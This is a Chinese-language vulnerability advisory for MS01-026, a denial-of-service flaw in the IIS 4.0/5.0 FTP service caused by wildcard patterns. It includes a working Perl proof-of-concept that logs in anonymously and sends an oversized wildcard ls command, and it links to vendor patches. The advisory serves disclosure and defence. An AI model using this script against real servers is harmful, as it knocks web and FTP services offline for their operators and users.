发布日期：2001-05-18
更新日期：2001-05-18

受影响系统：

Microsoft IIS 5.0
   － Microsoft Windows 2000
Microsoft IIS 4.0
   － Microsoft Windows NT 4.0

描述：

---

BUGTRAQ ID :
CVE ID :     CAN-2001-0334

微软IIS 4.0/5.0所带的FTP服务存在一个安全漏洞，可以造成对FTP服务器的拒绝服务
攻击。一个处理FTP命令通配符序列的功能有时无法在进行模式匹配时分配足够的内存。
一般情况下，攻击者可以执行一个带有通配符序列的FTP命令，使它溢出已分配的内存
并造成访问错误。这会造成IIS服务（可提供web和FTP功能）中断。因此，所有正在进
行的web或FTP进程会被切断，在IIS服务被重起以前，新的进程无法建立。IIS 5.0服务
可以自动重起。IIS 4.0服务须管理员手动重起。

<*来源：Lukasz Luzar(lluzar@developers.of.pl)
        Aiden ORawe
        微软安全公告MS01-026:
        http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
*>              



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Nelson Bunker提供了下列测试代码：

#!/usr/bin/perl
# Author:  Nelson Bunker - Critical Watch
#        http://www.criticalwatch.com
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026
# Tested against several servers.  Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [lluzar@developers.of.pl]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################


use Net::FTP;

        $wildcard='**********************************************************
        ***********************************************';

if (not $ARGV[0]) {

print qq~

       Usage: wildcard_dos.pl <host>

~;

        exit;}


        $IPaddress= $ARGV[0];


        $SIG {'PIPE'} = FoundIt;

        # create new FTP connection w/30 second timeout
        $ftp = Net::FTP->new($IPaddress, Timeout =>  5);

        if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}

        if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on
        $IPaddress is unacceptable";}

        $bogus = $ftp->ls($wildcard);


sub FoundIt
        {
        print "This machine \($IPaddress\) is affected\n";
    exit(0);

        }


建议：

---

厂商补丁：

微软已就此发布了一个安全公告(MS01-026)以及相应补丁。

您可以在下列地址看到微软安全公告的详细内容：

http://www.microsoft.com/technet/security/bulletin/ms01-026.asp

补丁程序可以在下列地址下载：

. Microsoft IIS 4.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787

. Microsoft IIS 5.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764



浏览次数：4204
严重程度：0（网友投票）